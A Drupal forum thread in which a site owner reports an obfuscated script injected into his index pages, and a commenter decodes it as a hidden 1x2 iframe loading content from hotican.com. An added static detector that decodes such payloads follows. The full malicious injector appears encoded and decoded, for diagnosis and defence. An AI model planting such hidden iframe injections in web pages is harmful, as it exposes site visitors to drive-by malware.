Hi,

I recently noticed a piece of code in my pages. I was wondering if anyone has seen this. It appears to be injected JavaScript. Here's the code:

echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,104,111,116,34,59,118,97,114,32,119,61,34,105,34,59,118,97,114,32,114,101,54,61,34,99,97,110,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48))</script>';

It is bizarre and appears only in all my index.html and index.php pages. Please let me know if anyone has seen this and what you think it might be. Is it an attack of some kind? Thanks.

--Jimmy

Comments

grobemo

It seems malicious to me. Delete it. You may also want to contact the security team to report the problem, especially if it reappears and/or if you're using the latest version of Drupal.

It's printing an <iframe> to your page. Here's the JavaScript it's evaluating, decoded:

var hjg4="hot";
var w="i";
var re6="can.";
var rrtt6="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="2">');

The iframe, which will be virtually invisible on your page, points to hotican.com, which appears to try to load a PDF. (I don't know what the PDF is. I haven't opened it.)
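The decoding described in the comment above can be reproduced statically, without ever running the injected script. The following is an added example, not part of the original thread. The function names, the constructed sample line (pointing at a harmless `example.invalid` host) and the 2-pixel size threshold are assumptions.

```javascript
// Added example: static decoder. Nothing from the scanned text is eval'd.
// Constructed sample with the same shape as the injected line, harmless host.
const samplePayload = `var a="if";var h="example.";var t="invalid";` +
  `document.write('<'+a+'rame src="http://'+h+''+t+'/" width="1" height="2"></i'+'f'+'rame>');`;
const sampleLine = '<script type="text/javascript">eval(String.fromCharCode(' +
  [...samplePayload].map(c => c.charCodeAt(0)).join(',') + '))</script>';

// Turn every String.fromCharCode(n,n,...) call in the text back into its string.
function decodeCharCodeCalls(text) {
  const decoded = [];
  for (const m of text.matchAll(/String\.fromCharCode\(([\d\s,]+)\)/g)) {
    const codes = m[1].split(',').map(n => parseInt(n.trim(), 10)).filter(Number.isFinite);
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Undo the string splitting: inline var x="..." values used as '+x+',
// then join adjacent literals ('a'+'b' becomes 'ab').
function foldStrings(js) {
  const vars = {};
  for (const m of js.matchAll(/var\s+(\w+)\s*=\s*"([^"]*)"\s*;/g)) vars[m[1]] = m[2];
  const inlined = js.replace(/'\s*\+\s*(\w+)\s*\+\s*'/g,
    (all, name) => (name in vars ? vars[name] : all));
  return inlined.replace(/'\s*\+\s*'/g, '');
}

// Report iframes written by decoded payloads whose width or height is <= 2 px.
function findHiddenIframes(text) {
  const hits = [];
  for (const payload of decodeCharCodeCalls(text)) {
    for (const m of foldStrings(payload).matchAll(/<iframe\b([^>]*)>/gi)) {
      const attr = name =>
        (m[1].match(new RegExp(name + '\\s*=\\s*"([^"]*)"', 'i')) || [])[1];
      const width = parseInt(attr('width'), 10);
      const height = parseInt(attr('height'), 10);
      if (width <= 2 || height <= 2) hits.push({ src: attr('src'), width, height });
    }
  }
  return hits;
}

console.log(findHiddenIframes(sampleLine));
```

Running `findHiddenIframes` over the contents of each index.html and index.php file shows which files carry the injection and where the hidden frame points.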

dpearcefl

Status: Active » Closed (won't fix)

Doesn't look like a Drupal problem.